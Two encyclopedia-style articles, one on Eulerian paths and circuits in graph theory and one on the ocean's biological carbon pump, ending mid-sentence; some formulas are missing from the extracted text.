In graph theory, an Eulerian trail (or Eulerian path) is a trail in a finite graph that visits every edge exactly once (allowing for revisiting vertices). Similarly, an Eulerian circuit or Eulerian cycle is an Eulerian trail that starts and ends on the same vertex. They were first discussed by Leonhard Euler while solving the famous Seven Bridges of Königsberg problem in 1736. The problem can be stated mathematically like this: Given the graph in the image, is it possible to construct a path (or a cycle; i.e., a path starting and ending on the same vertex) that visits each edge exactly once? Euler proved that a necessary condition for the existence of Eulerian circuits is that all vertices in the graph have an even degree, and stated without proof that connected graphs with all vertices of even degree have an Eulerian circuit. The first complete proof of this latter claim was published posthumously in 1873 by Carl Hierholzer. This is known as Euler's Theorem: A connected graph has an Euler cycle if and only if every vertex has an even number of incident edges. The term Eulerian graph has two common meanings in graph theory. One meaning is a graph with an Eulerian circuit, and the other is a graph with every vertex of even degree. These definitions coincide for connected graphs. For the existence of Eulerian trails it is necessary that zero or two vertices have an odd degree; this means the Königsberg graph is not Eulerian. If there are no vertices of odd degree, all Eulerian trails are circuits. If there are exactly two vertices of odd degree, all Eulerian trails start at one of them and end at the other. A graph that has an Eulerian trail but not an Eulerian circuit is called semi-Eulerian. Definition An Eulerian trail, or Euler walk, in an undirected graph is a walk that uses each edge exactly once. If such a walk exists, the graph is called traversable or semi-eulerian. An Eulerian cycle, also called an Eulerian circuit or Euler tour, in an undirected graph is a cycle that uses each edge exactly once. If such a cycle exists, the graph is called Eulerian or unicursal. The term "Eulerian graph" is also sometimes used in a weaker sense to denote a graph where every vertex has even degree. For finite connected graphs the two definitions are equivalent, while a possibly unconnected graph is Eulerian in the weaker sense if and only if each connected component has an Eulerian cycle. For directed graphs, "path" has to be replaced with directed path and "cycle" with directed cycle. The definition and properties of Eulerian trails, cycles and graphs are valid for multigraphs as well. An Eulerian orientation of an undirected graph G is an assignment of a direction to each edge of G such that, at each vertex v, the indegree of v equals the outdegree of v. Such an orientation exists for any undirected graph in which every vertex has even degree, and may be found by constructing an Euler tour in each connected component of G and then orienting the edges according to the tour. Every Eulerian orientation of a connected graph is a strong orientation, an orientation that makes the resulting directed graph strongly connected. Properties An undirected graph has an Eulerian cycle if and only if every vertex has even degree, and all of its vertices with nonzero degree belong to a single connected component. An undirected graph can be decomposed into edge-disjoint cycles if and only if all of its vertices have even degree. So, a graph has an Eulerian cycle if and only if it can be decomposed into edge-disjoint cycles and its nonzero-degree vertices belong to a single connected component. An undirected graph has an Eulerian trail if and only if exactly zero or two vertices have odd degree, and all of its vertices with nonzero degree belong to a single connected component. A directed graph has an Eulerian cycle if and only if every vertex has equal in degree and out degree, and all of its vertices with nonzero degree belong to a single strongly connected component. Equivalently, a directed graph has an Eulerian cycle if and only if it can be decomposed into edge-disjoint directed cycles and all of its vertices with nonzero degree belong to a single strongly connected component. A directed graph has an Eulerian trail if and only if at most one vertex has at most one vertex has every other vertex has equal in-degree and out-degree, and all of its vertices with nonzero degree belong to a single connected component of the underlying undirected graph. Constructing Eulerian trails and circuits Fleury's algorithm Fleury's algorithm is an elegant but inefficient algorithm that dates to 1883. Consider a graph known to have all edges in the same component and at most two vertices of odd degree. The algorithm starts at a vertex of odd degree, or, if the graph has none, it starts with an arbitrarily chosen vertex. At each step it chooses the next edge in the path to be one whose deletion would not disconnect the graph, unless there is no such edge, in which case it picks the remaining edge left at the current vertex. It then moves to the other endpoint of that edge and deletes the edge. At the end of the algorithm there are no edges left, and the sequence from which the edges were chosen forms an Eulerian cycle if the graph has no vertices of odd degree, or an Eulerian trail if there are exactly two vertices of odd degree. While the graph traversal in Fleury's algorithm is linear in the number of edges, i.e. , we also need to factor in the complexity of detecting bridges. If we are to re-run Tarjan's linear time bridge-finding algorithm after the removal of every edge, Fleury's algorithm will have a time complexity of . A dynamic bridge-finding algorithm of allows this to be improved to , but this is still significantly slower than alternative algorithms. Hierholzer's algorithm Hierholzer's 1873 paper provides a different method for finding Euler cycles that is more efficient than Fleury's algorithm: Choose any starting vertex v, and follow a trail of edges from that vertex until returning to v. It is not possible to get stuck at any vertex other than v, because the even degree of all vertices ensures that, when the trail enters another vertex w there must be an unused edge leaving w. The tour formed in this way is a closed tour, but may not cover all the vertices and edges of the initial graph. As long as there exists a vertex u that belongs to the current tour but that has adjacent edges not part of the tour, start another trail from u, following unused edges until returning to u, and join the tour formed in this way to the previous tour. Since we assume the original graph is connected, repeating the previous step will exhaust all edges of the graph. By using a data structure such as a doubly linked list to maintain the set of unused edges incident to each vertex, to maintain the list of vertices on the current tour that have unused edges, and to maintain the tour itself, the individual operations of the algorithm (finding unused edges exiting each vertex, finding a new starting vertex for a tour, and connecting two tours that share a vertex) may be performed in constant time each, so the overall algorithm takes linear time, . This algorithm may also be implemented with a deque. Because it is only possible to get stuck when the deque represents a closed tour, one should rotate the deque by removing edges from the tail and adding them to the head until unstuck, and then continue until all edges are accounted for. This also takes linear time, as the number of rotations performed is never larger than (intuitively, any "bad" edges are moved to the head, while fresh edges are added to the tail) Counting Eulerian circuits Complexity issues The number of Eulerian circuits in digraphs can be calculated using the so-called BEST theorem, named after de Bruijn, van Aardenne-Ehrenfest, Smith and Tutte. The formula states that the number of Eulerian circuits in a digraph is the product of certain degree factorials and the number of rooted arborescences. The latter can be computed as a determinant, by the matrix tree theorem, giving a polynomial time algorithm. BEST theorem is first stated in this form in a "note added in proof" to the Aardenne-Ehrenfest and de Bruijn paper (1951). The original proof was bijective and generalized the de Bruijn sequences. It is a variation on an earlier result by Smith and Tutte (1941). Counting the number of Eulerian circuits on undirected graphs is much more difficult. This problem is known to be #P-complete. In a positive direction, a Markov chain Monte Carlo approach, via the Kotzig transformations (introduced by Anton Kotzig in 1968) is believed to give a sharp approximation for the number of Eulerian circuits in a graph, though as yet there is no proof of this fact (even for graphs of bounded degree). Special cases An asymptotic formula for the number of Eulerian circuits in the complete graphs was determined by McKay and Robinson (1995): A similar formula was later obtained by M.I. Isaev (2009) for complete bipartite graphs: Applications Eulerian trails are used in bioinformatics to reconstruct the DNA sequence from its fragments. They are also used in CMOS circuit design to find an optimal logic gate ordering. There are some algorithms for processing trees that rely on an Euler tour of the tree (where each edge is treated as a pair of arcs). The de Bruijn sequences can be constructed as Eulerian trails of de Bruijn graphs. In infinite graphs In an infinite graph, the corresponding concept to an Eulerian trail or Eulerian cycle is an Eulerian line, a doubly-infinite trail that covers all of the edges of the graph. It is not sufficient for the existence of such a trail that the graph be connected and that all vertex degrees be even; for instance, the infinite Cayley graph shown, with all vertex degrees equal to four, has no Eulerian line. The infinite graphs that contain Eulerian lines were characterized by . For an infinite graph or multigraph to have an Eulerian line, it is necessary and sufficient that all of the following conditions be met: is connected. has countable sets of vertices and edges. has no vertices of (finite) odd degree. Removing any finite subgraph from leaves at most two infinite connected components in the remaining graph, and if has even degree at each of its vertices then removing leaves exactly one infinite connected component. Undirected Eulerian graphs Euler stated a necessary condition for a finite graph to be Eulerian as all vertices must have even degree. Hierholzer proved this is a sufficient condition in a paper published in 1873. This leads to the following necessary and sufficient statement for what a finite graph must have to be Eulerian: An undirected connected finite graph is Eulerian if and only if every vertex of G has even degree. The following result was proved by Veblen in 1912: An undirected connected graph is Eulerian if and only if it is the disjoint union of some cycles.Hierholzer developed a linear time algorithm for constructing an Eulerian tour in an undirected graph. Directed Eulerian graphs It is possible to have a directed graph that has all even out-degrees but is not Eulerian. Since an Eulerian circuit leaves a vertex the same number of times as it enters that vertex, a necessary condition for an Eulerian circuit to exist is that the in-degree and out-degree are equal at each vertex. Obviously, connectivity is also necessary. König proved that these conditions are also sufficient. That is, a directed graph is Eulerian if and only if it is connected and the in-degree and out-degree are equal at each vertex. In this theorem it doesn't matter whether "connected" means "weakly connected" or "strongly connected" since they are equivalent for Eulerian graphs. Hierholzer's linear time algorithm for constructing an Eulerian tour is also applicable to directed graphs. Mixed Eulerian graphs All mixed graphs that are both even and symmetric are guaranteed to be Eulerian. However, this is not a necessary condition, as it is possible to construct a non-symmetric, even graph that is Eulerian. Ford and Fulkerson proved in 1962 in their book Flows in Networks a necessary and sufficient condition for a graph to be Eulerian, viz., that every vertex must be even and satisfy the balance condition, i.e. for every subset of vertices S, the difference between the number of arcs leaving S and entering S must be less than or equal to the number of edges incident with S. The process of checking if a mixed graph is Eulerian is harder than checking if an undirected or directed graph is Eulerian because the balanced set condition concerns every possible subset of vertices. See also Eulerian matroid, an abstract generalization of Eulerian graphs Five room puzzle Handshaking lemma, proven by Euler in his original paper, showing that any undirected connected graph has an even number of odd-degree vertices Hamiltonian path – a path that visits each vertex exactly once. Route inspection problem, search for the shortest path that visits all edges, possibly repeating edges if an Eulerian path does not exist. Veblen's theorem, which states that graphs with even vertex degree can be partitioned into edge-disjoint cycles regardless of their connectivity Notes References Bibliography . Translated as . Euler, L., "Solutio problematis ad geometriam situs pertinentis", Comment. Academiae Sci. I. Petropolitanae 8 (1736), 128–140. . Lucas, E., Récréations Mathématiques IV, Paris, 1921. Fleury, "Deux problemes de geometrie de situation", Journal de mathematiques elementaires (1883), 257–261. T. van Aardenne-Ehrenfest and N. G. de Bruijn (1951) "Circuits and trees in oriented linear graphs", Simon Stevin 28: 203–217. W. T. Tutte and C. A. B. Smith (1941) "On Unicursal Paths in a Network of Degree 4", American Mathematical Monthly 48: 233–237. External links Discussion of early mentions of Fleury's algorithm. Euler tour at Encyclopedia of Mathematics. Graph theory objects Leonhard Euler
Eulerian path
Mathematics
3,156
240,228
https://en.wikipedia.org/wiki/Biological%20pump
The biological pump (or ocean carbon biological pump or marine biological carbon pump) is the ocean's biologically driven sequestration of carbon from the atmosphere and land runoff to the ocean interior and seafloor sediments. In other words, it is a biologically mediated process which results in the sequestering of carbon in the deep ocean away from the atmosphere and the land. The biological pump is the biological component of the "marine carbon pump" which contains both a physical and biological component. It is the part of the broader oceanic carbon cycle responsible for the cycling of organic matter formed mainly by phytoplankton during photosynthesis (soft-tissue pump), as well as the cycling of calcium carbonate (CaCO3) formed into shells by certain organisms such as plankton and mollusks (carbonate pump). Budget calculations of the biological carbon pump are based on the ratio between sedimentation (carbon export to the ocean floor) and remineralization (release of carbon to the atmosphere). The biological pump is not so much the result of a single process, but rather the sum of a number of processes each of which can influence biological pumping. Overall, the pump transfers about 10.2 gigatonnes of carbon every year into the ocean's interior and a total of 1300 gigatonnes carbon over an average 127 years. This takes carbon out of contact with the atmosphere for several thousand years or longer. An ocean without a biological pump would result in atmospheric carbon dioxide levels about 400 ppm higher than the present day. Overview The element carbon plays a central role in climate and life on Earth. It is capable of moving among and between the geosphere, cryosphere, atmosphere, biosphere and hydrosphere. This flow of carbon is referred to as the Earth's carbon cycle. It is also intimately linked to the cycling of other elements and compounds. The ocean plays a fundamental role in Earth's carbon cycle, helping to regulate atmospheric CO2 concentration. The biological pump is a set of processes that transfer organic carbon from the surface to the deep ocean, and is at the heart of the ocean carbon cycle. The biological pump depends on the fraction of primary produced organic matter that survives degradation in the euphotic zone and that is exported from surface water to the ocean interior, where it is mineralized to inorganic carbon, with the result that carbon is transported against the gradient of dissolved inorganic carbon (DIC) from the surface to the deep ocean. This transfer occurs through physical mixing and transport of dissolved and particulate organic carbon (POC), vertical migrations of organisms (zooplankton, fish) and through gravitational settling of particulate organic carbon. The biological pump can be divided into three distinct phases, the first of which is the production of fixed carbon by planktonic phototrophs in the euphotic (sunlit) surface region of the ocean. In these surface waters, phytoplankton use carbon dioxide (CO2), nitrogen (N), phosphorus (P), and other trace elements (barium, iron, zinc, etc.) during photosynthesis to make carbohydrates, lipids, and proteins. Some plankton, (e.g. coccolithophores and foraminifera) combine calcium (Ca) and dissolved carbonates (carbonic acid and bicarbonate) to form a calcium carbonate (CaCO3) protective coating. Once this carbon is fixed into soft or hard tissue, the organisms either stay in the euphotic zone to be recycled as part of the regenerative nutrient cycle or once they die, continue to the second phase of the biological pump and begin to sink to the ocean floor. The sinking particles will often form aggregates as they sink, which greatly increases the sinking rate. It is this aggregation that gives particles a better chance of escaping predation and decomposition in the water column and eventually making it to the sea floor. The fixed carbon that is decomposed by bacteria either on the way down or once on the sea floor then enters the final phase of the pump and is remineralized to be used again in primary production. The particles that escape these processes entirely are sequestered in the sediment and may remain there for millions of years. It is this sequestered carbon that is responsible for ultimately lowering atmospheric CO2. Biology, physics and gravity interact to pump organic carbon into the deep sea. The processes of fixation of inorganic carbon in organic matter during photosynthesis, its transformation by food web processes (trophodynamics), physical mixing, transport and gravitational settling are referred to collectively as the biological pump. The biological pump is responsible for transforming dissolved inorganic carbon (DIC) into organic biomass and pumping it in particulate or dissolved form into the deep ocean. Inorganic nutrients and carbon dioxide are fixed during photosynthesis by phytoplankton, which both release dissolved organic matter (DOM) and are consumed by herbivorous zooplankton. Larger zooplankton - such as copepods - egest fecal pellets which can be reingested and sink or collect with other organic detritus into larger, more-rapidly-sinking aggregates. DOM is partially consumed by bacteria (black dots) and respired; the remaining refractory DOM is advected and mixed into the deep sea. DOM and aggregates exported into the deep water are consumed and respired, thus returning organic carbon into the enormous deep ocean reservoir of DIC. About 1% of the particles leaving the surface ocean reach the seabed and are consumed, respired, or buried in the sediments. There, carbon is stored for millions of years. The net effect of these processes is to remove carbon in organic form from the surface and return it to DIC at greater depths, maintaining the surface-to-deep ocean gradient of DIC. Thermohaline circulation returns deep-ocean DIC to the atmosphere on millennial timescales. Primary production The first step in the biological pump is the synthesis of both organic and inorganic carbon compounds by phytoplankton in the uppermost, sunlit layers of the ocean. Organic compounds in the form of sugars, carbohydrates, lipids, and proteins are synthesized during the process of photosynthesis: CO2 + H2O + light → CH2O + O2 In addition to carbon, organic matter found in phytoplankton is composed of nitrogen, phosphorus and various trace metals. The ratio of carbon to nitrogen and phosphorus varies from place to place, but has an average ratio near 106C:16N:1P, known as the Redfield ratio. Trace metals such as magnesium, cadmium, iron, calcium, barium and copper are orders of magnitude less prevalent in phytoplankton organic material, but necessary for certain metabolic processes and therefore can be limiting nutrients in photosynthesis due to their lower abundance in the water column. Oceanic primary production accounts for about half of the carbon fixation carried out on Earth. Approximately 50–60 Pg of carbon are fixed by marine phytoplankton each year despite the fact that they account for less than 1% of the total photosynthetic biomass on Earth. The majority of this carbon fixation (~80%) is carried out in the open ocean while the remaining amount occurs in the very productive upwelling regions of the ocean. Despite these productive regions producing 2 to 3 times as much fixed carbon per area, the open ocean accounts for greater than 90% of the ocean area and therefore is the larger contributor. Forms of carbon Dissolved and particulate carbon Phytoplankton supports all life in the ocean as it converts inorganic compounds into organic constituents. This autotrophically produced biomass presents the foundation of the marine food web. In the diagram immediately below, the arrows indicate the various production (arrowhead pointing toward DOM pool) and removal processes of DOM (arrowhead pointing away), while the dashed arrows represent dominant biological processes involved in the transfer of DOM. Due to these processes, the fraction of labile DOM decreases rapidly with depth, whereas the refractory character of the DOM pool considerably increases during its export to the deep ocean. DOM, dissolved organic matter. Ocean carbon pools The marine biological pump depends on a number of key pools, components and processes that influence its functioning. There are four main pools of carbon in the ocean. Dissolved inorganic carbon (DIC) is the largest pool. It constitutes around 38,000 Pg C and includes dissolved carbon dioxide (CO2), bicarbonate (), carbonate (), and carbonic acid (). The equilibrium between carbonic acid and carbonate determines the pH of the seawater. Carbon dioxide dissolves easily in water and its solubility is inversely related to temperature. Dissolved CO2 is taken up in the process of photosynthesis, and can reduce the partial pressure of CO2 in the seawater, favouring drawdown from the atmosphere. The reverse process respiration, releases CO2 back into the water, can increase partial pressure of CO2 in the seawater, favouring release back to the atmosphere. The formation of calcium carbonate by organisms such as coccolithophores has the effect of releasing CO2 into the water. Dissolved organic carbon (DOC) is the next largest pool at around 662 Pg C. DOC can be classified according to its reactivity as refractory, semi-labile or labile. The labile pool constitutes around 0.2 Pg C, is bioavailable, and has a high production rate (~ 15−25 Pg C y−1). The refractory component is the biggest pool (~642 Pg C ± 32; but has a very low turnover rate (0.043 Pg C y−1). The turnover time for refractory DOC is thought to be greater than 1000 years. Particulate organic carbon (POC) constitutes around 2.3 Pg C, and is relatively small compared with DIC and DOC. Though small in size, this pool is highly dynamic, having the highest turnover rate of any organic carbon pool on the planet. Driven by primary production, it produces around 50 Pg C y−1 globally. It can be separated into living (e.g. phytoplankton, zooplankton, bacteria) and non-living (e.g. detritus) material. Of these, the phytoplankton carbon is particularly important, because of its role in marine primary production, and also because it serves as the food resource for all the larger organisms in the pelagic ecosystem. Particulate inorganic carbon (PIC) is the smallest of the pools at around 0.03 Pg C. It is present in the form of calcium carbonate (CaCO3) in particulate form, and impacts the carbonate system and pH of the seawater. Estimates for PIC production are in the region of 0.8–1.4 Pg C y−1, with at least 65% of it being dissolved in the upper water column, the rest contributing to deep sediments. Coccolithophores and foraminifera are estimated to be the dominant sources of PIC in the open ocean. The PIC pool is of particular importance due to its role in the ocean carbonate system, and in facilitating the export of carbon to the deep ocean through the carbonate pump, whereby PIC is exported out of the photic zone and deposited in the bottom sediments. Calcium carbonate Particulate inorganic carbon (PIC) usually takes the form of calcium carbonate (CaCO3), and plays a key part in the ocean carbon cycle. This biologically fixed carbon is used as a protective coating for many planktonic species (coccolithophores, foraminifera) as well as larger marine organisms (mollusk shells). Calcium carbonate is also excreted at high rates during osmoregulation by fish, and can form in whiting events. While this form of carbon is not directly taken from the atmospheric budget, it is formed from dissolved forms of carbonate which are in equilibrium with CO2 and then responsible for removing this carbon via sequestration. CO2 + H2O → H2CO3 → H+ + HCO3− Ca2+ + 2HCO3− → CaCO3 + CO2 + H2O While this process does manage to fix a large amount of carbon, two units of alkalinity are sequestered for every unit of sequestered carbon. The formation and sinking of CaCO3 therefore drives a surface to deep alkalinity gradient which serves to raise the pH of surface waters, shifting the speciation of dissolved carbon to raise the partial pressure of dissolved CO2 in surface waters, which actually raises atmospheric levels. In addition, the burial of CaCO3 in sediments serves to lower overall oceanic alkalinity, tending to raise pH and thereby atmospheric CO2 levels if not counterbalanced by the new input of alkalinity from weathering. The portion of carbon that is permanently buried at the sea floor becomes part of the geologic record. Calcium carbonate often forms remarkable deposits that can then be raised onto land through tectonic motion as in the case with the White Cliffs of Dover in Southern England. These cliffs are made almost entirely of the plates of buried coccolithophores. Oceanic carbon cycle Three main processes (or pumps) that make up the marine carbon cycle bring atmospheric carbon dioxide (CO2) into the ocean interior and distribute it through the oceans. These three pumps are: (1) the solubility pump, (2) the carbonate pump, and (3) the biological pump. The total active pool of carbon at the Earth's surface for durations of less than 10,000 years is roughly 40,000 gigatons C (Gt C, a gigaton is one billion tons, or the weight of approximately 6 million blue whales), and about 95% (~38,000 Gt C) is stored in the ocean, mostly as dissolved inorganic carbon. The speciation of dissolved inorganic carbon in the marine carbon cycle is a primary controller of acid-base chemistry in the oceans. Solubility pump The biological pump is accompanied by a physico-chemical counterpart known as the solubility pump. This pump transports significant amounts of carbon in the form of dissolved inorganic carbon (DIC) from the ocean's surface to its interior. It involves physical and chemical processes only, and does not involve biological processes. The solubility pump is driven by the coincidence of two processes in the ocean: The solubility of carbon dioxide is a strong inverse function of seawater temperature (i.e. solubility is greater in cooler water) The thermohaline circulation is driven by the formation of deep water at high latitudes where seawater is usually cooler and denser Since deep water (that is, seawater in the ocean's interior) is formed under the same surface conditions that promote carbon dioxide solubility, it contains a higher concentration of dissolved inorganic carbon than might be expected from average surface concentrations. Consequently, these two processes act together to pump carbon from the atmosphere into the ocean's interior. One consequence of this is that when deep water upwells in warmer, equatorial latitudes, it strongly outgasses carbon dioxide to the atmosphere because of the reduced solubility of the gas. Carbonate pump The carbonate pump is sometimes referred to as the "hard tissue" component of the biological pump. Some surface marine organisms, like coccolithophores, produce hard structures out of calcium carbonate, a form of particulate inorganic carbon, by fixing bicarbonate. This fixation of DIC is an important part of the oceanic carbon cycle. Ca2+ + 2 HCO3− → CaCO3 + CO2 + H2O While the biological carbon pump fixes inorganic carbon (CO2) into particulate organic carbon in the form of sugar (C6H12O6), the carbonate pump fixes inorganic bicarbonate and causes a net release of CO2. In this way, the carbonate pump could be termed the carbonate counter pump. It works counter to the biological pump by counteracting the CO2 flux into the biological pump. Continental shelf pump The continental shelf pump is proposed as operating in the shallow waters of the continental shelves as a mechanism transporting carbon (dissolved or particulate) from the continental waters to the interior of the adjacent deep ocean. As originally formulated, the pump is thought to occur where the solubility pump interacts with cooler, and therefore denser water from the shelf floor which feeds down the continental slope into the neighbouring deep ocean. The shallowness of the continental shelf restricts the convection of cooling water, so the cooling can be greater for continental shelf waters than for neighbouring open ocean waters. These cooler waters promote the solubility pump and lead to an increased storage of dissolved inorganic carbon. This extra carbon storage is further augmented by the increased biological production characteristic of shelves. The dense, carbon-rich shelf waters then sink to the shelf floor and enter the sub-surface layer of the open ocean via isopycnal mixing. As the sea level rises in response to global warming, the surface area of the shelf seas will grow and in consequence the strength of the shelf sea pump should increase. Processes in the biological pump In the diagram on the right, phytoplankton convert CO2, which has dissolved from the atmosphere into the surface oceans (90 Gt yr−1), into particulate organic carbon (POC) during primary production (~ 50 Gt C yr−1). Phytoplankton are then consumed by copepods, krill and other small zooplankton grazers, which in turn are preyed upon by higher trophic levels. Any unconsumed phytoplankton form aggregates, and along with zooplankton faecal pellets, sink rapidly and are exported out of the mixed layer (< 12 Gt C yr−1 14). Krill, copepods, zooplankton and microbes intercept phytoplankton in the surface ocean and sinking detrital particles at depth, consuming and respiring this POC to CO2 (dissolved inorganic carbon, DIC), such that only a small proportion of surface-produced carbon sinks to the deep ocean (i.e., depths > 1000 m). As krill and smaller zooplankton feed, they also physically fragment particles into small, slower- or non-sinking pieces (via sloppy feeding, coprorhexy if fragmenting faeces), retarding POC export. This releases dissolved organic carbon (DOC) either directly from cells or indirectly via bacterial solubilisation (yellow circle around DOC). Bacteria can then remineralise the DOC to DIC (CO2, microbial gardening). The biological carbon pump is one of the chief determinants of the vertical distribution of carbon in the oceans and therefore of the surface partial pressure of CO2 governing air-sea CO2 exchange. It comprises phytoplankton cells, their consumers and the bacteria that assimilate their waste and plays a central role in the global carbon cycle by delivering carbon from the atmosphere to the deep sea, where it is concentrated and sequestered for centuries. Photosynthesis by phytoplankton lowers the partial pressure of CO2 in the upper ocean, thereby facilitating the absorption of CO2 from the atmosphere by generating a steeper CO2 gradient. It also results in the formation of particulate organic carbon (POC) in the euphotic layer of the epipelagic zone (0–200 m depth). The POC is processed by microbes, zooplankton and their consumers into fecal pellets, organic aggregates ("marine snow") and other forms, which are thereafter exported to the mesopelagic (200–1000 m depth) and bathypelagic zones by sinking and vertical migration by zooplankton and fish. Although primary production includes both dissolved and particulate organic carbon (DOC and POC respectively), only POC leads to efficient carbon export to the ocean interior, whereas the DOC fraction in surface waters is mostly recycled by bacteria. However, a more biologically resistant DOC fraction produced in the euphotic zone (accounting for 15–20% of net community productivity), is not immediately mineralized by microbes and accumulates in the ocean surface as biologically semi-labile DOC. This semi-labile DOC undergoes net export to the deep ocean, thus constituting a dynamic part of the biological carbon pump. The efficiency of DOC production and export varies across oceanographic regions, being more prominent in the oligotrophic subtropical oceans. The overall efficiency of the biological carbon pump is mostly controlled by the export of POC. Marine snow Most carbon incorporated in organic and inorganic biological matter is formed at the sea surface where it can then start sinking to the ocean floor. The deep ocean gets most of its nutrients from the higher water column when they sink down in the form of marine snow. This is made up of dead or dying animals and microbes, fecal matter, sand and other inorganic material. A single phytoplankton cell has a sinking rate around one metre per day. Given that the average depth of the ocean is about four kilometres, it can take over ten years for these cells to reach the ocean floor. However, through processes such as coagulation and expulsion in predator fecal pellets, these cells form aggregates. These aggregates, known as marine snow, have sinking rates orders of magnitude greater than individual cells and complete their journey to the deep in a matter of days. In the diagram on the right, phytoplankton fix CO2 in the euphotic zone using solar energy and produce particulate organic carbon (POC). POC formed in the euphotic zone is processed by microbes, zooplankton and their consumers into organic aggregates (marine snow), which is thereafter exported to the mesopelagic (200–1000 m depth) and bathypelagic zones by sinking and vertical migration by zooplankton and fish. Export flux is defined as the sedimentation out of the surface layer (at approximately 100 m depth) and sequestration flux is the sedimentation out of the mesopelagic zone (at approximately 1000 m depth). A portion of the POC is respired back to CO2 in the oceanic water column at depth, mostly by heterotrophic microbes and zooplankton, thus maintaining a vertical gradient in concentration of dissolved inorganic carbon (DIC). This deep-ocean DIC returns to the atmosphere on millennial timescales through thermohaline circulation. Between 1% and 40% of the primary production is exported out of the euphotic zone, which attenuates exponentially towards the base of the mesopelagic zone and only about 1% of the surface production reaches the sea floor. Of the 50–60 Pg of carbon fixed annually, roughly 10% leaves the surface mixed layer of the oceans, while less than 0.5% of eventually reaches the sea floor. Most is retained in regenerated production in the euphotic zone and a significant portion is remineralized in midwater processes during particle sinking. The portion of carbon that leaves the surface mixed layer of the ocean is sometimes considered "sequestered", and essentially removed from contact with the atmosphere for many centuries. However, work also finds that, in regions such as the Southern Ocean, much of this carbon can quickly (within decades) come back into contact with the atmosphere. Budget calculations of the biological carbon pump are based on the ratio between sedimentation (carbon export) and remineralization (release to the atmosphere). It has been estimated that sinking particles export up to 25% of the carbon captured by phytoplankton in the surface ocean to deeper water layers. About 20% of this export (5% of surface values) is buried in the ocean sediments mainly due to their mineral ballast. During the sinking process, these organic particles are hotspots of microbial activity and represent important loci for organic matter mineralization and nutrient redistribution in the water column. Biomineralization Ballast minerals Observations have shown that fluxes of ballast minerals (calcium carbonate, opal, and lithogenic material) and organic carbon fluxes are closely correlated in the bathypelagic zones of the ocean. A large fraction of particulate organic matter occurs in the form of marine snow aggregates (>0.5 mm) composed of phytoplankton, detritus, inorganic mineral grains, and fecal pellets in the ocean. Formation and sinking of these aggregates drive the biological carbon pump via export and sedimentation of organic matter from the surface mixed layer to the deep ocean and sediments. The fraction of organic matter that leaves the upper mixed layer of the ocean is, among other factors, determined by the sinking velocity and microbial remineralisation rate of these aggregates. Recent observations have shown that the fluxes of ballast minerals (calcium carbonate, opal, and lithogenic material) and the organic carbon fluxes are closely correlated in the bathypelagic zones of the ocean. This has led to the hypothesis that organic carbon export is determined by the presence of ballast minerals within settling aggregates. Mineral ballasting is associated with about 60% of the flux of particulate organic carbon (POC) in the high-latitude North Atlantic, and with about 40% of the flux in the Southern Ocean. Strong correlations exist also in the deep ocean between the presence of ballast minerals and the flux of POC. This suggests ballast minerals enhance POC flux by increasing the sink rate of ballasted aggregates. Ballast minerals could additionally provide aggregated organic matter some protection from degradation. It has been proposed that organic carbon is better preserved in sinking particles due to increased aggregate density and sinking velocity when ballast minerals are present and/or via protection of the organic matter due to quantitative association to ballast minerals. In 2002, Klaas and Archer observed that about 83% of the global particulate organic carbon (POC) fluxes were associated with carbonate, and suggested carbonate was a more efficient ballast mineral as compared to opal and terrigenous material. They hypothesized that the higher density of calcium carbonate compared to that of opal and the higher abundance of calcium carbonate relative to terrigenous material might be the reason for the efficient ballasting by calcium carbonate. However, the direct effects of ballast minerals on sinking velocity and degradation rates in sinking aggregates are still unclear. A 2008 study demonstrated copepod fecal pellets produced on a diet of diatoms or coccolithophorids show higher sinking velocities as compared to pellets produced on a nanoflagellate diet. Carbon-specific respiration rates in pellets, however, were similar and independent of mineral content. These results suggest differences in mineral composition do not lead to differential protection of POC against microbial degradation, but the enhanced sinking velocities may result in up to 10-fold higher carbon preservation in pellets containing biogenic minerals as compared to that of pellets without biogenic minerals Minerals seem to enhance the flocculation of phytoplankton aggregates and may even act as a catalyst in aggregate formation. However, it has also been shown that incorporation of minerals can cause aggregates to fragment into smaller and denser aggregates. This can potentially lower the sinking velocity of the aggregated organic material due to the reduced aggregate sizes, and, thus, lower the total export of organic matter. Conversely, if the incorporation of minerals increases the aggregate density, its size-specific sinking velocity may also increase, which could potentially increase the carbon export. Therefore, there is still a need for better quantitative investigations of how the interactions between minerals and organic aggregates affect the degradation and sinking velocity of the aggregates and, hence, carbon sequestration in the ocean. Remineralisation Remineralisation refers to the breakdown or transformation of organic matter (those molecules derived from a biological source) into its simplest inorganic forms. These transformations form a crucial link within ecosystems as they are responsible for liberating the energy stored in organic molecules and recycling matter within the system to be reused as nutrients by other organisms. What fraction does escape remineralisation varies depending on the location. For example, in the North Sea, values of carbon deposition are ~1% of primary production while that value is <0.5% in the open oceans on average. Therefore, most of nutrients remain in the water column, recycled by the biota. Heterotrophic organisms will utilize the materials produced by the autotrophic (and chemotrophic) organisms and via respiration will remineralise the compounds from the organic form back to inorganic, making them available for primary producers again. For most areas of the ocean, the highest rates of carbon remineralisation occur at depths between in the water column, decreasing down to about where remineralisation rates remain pretty constant at 0.1 μmol kg−1 yr−1. This provides the most nutrients available for primary producers within the photic zone, though it leaves the upper surface waters starved of inorganic nutrients. Most remineralisation is done with dissolved organic carbon (DOC). Studies have shown that it is larger sinking particles that transport matter down to the sea floor while suspended particles and dissolved organics are mostly consumed by remineralisation. This happens in part due to the fact that organisms must typically ingest nutrients smaller than they are, often by orders of magnitude. With the microbial community making up 90% of marine biomass, it is particles smaller than the microbes (on the order of ) that will be taken up for remineralisation. Key role of phytoplankton Marine phytoplankton perform half of all photosynthesis on Earth and directly influence global biogeochemical cycles and the climate, yet how they will respond to future global change is unknown. Carbon dioxide is one of the principal drivers of global change and has been identified as one of the major challenges in the 21st century. Carbon dioxide (CO2) generated during anthropogenic activities such as deforestation and burning of fossil fuels for energy generation rapidly dissolves in the surface ocean and lowers seawater pH, while CO2 remaining in the atmosphere increases global temperatures and leads to increased ocean thermal stratification. While CO2 concentration in the atmosphere is estimated to be about 270 ppm before the industrial revolution, it has currently increased to about 400 ppm and is expected to reach 800–1000 ppm by the end of this century according to the "business as usual" CO2 emission scenario. Marine ecosystems are a major sink for atmospheric CO2 and take up similar amount of CO2 as terrestrial ecosystems, currently accounting for the removal of nearly one third of anthropogenic CO2 emissions from the atmosphere. The net transfer of CO2 from the atmosphere to the oceans and then sediments, is mainly a direct consequence of the combined effect of the solubility and the biological pump. While the solubility pump serves to concentrate dissolved inorganic carbon (CO2 plus bicarbonate and carbonate ions) in the deep oceans, the biological carbon pump (a key natural process and a major component of the global carbon 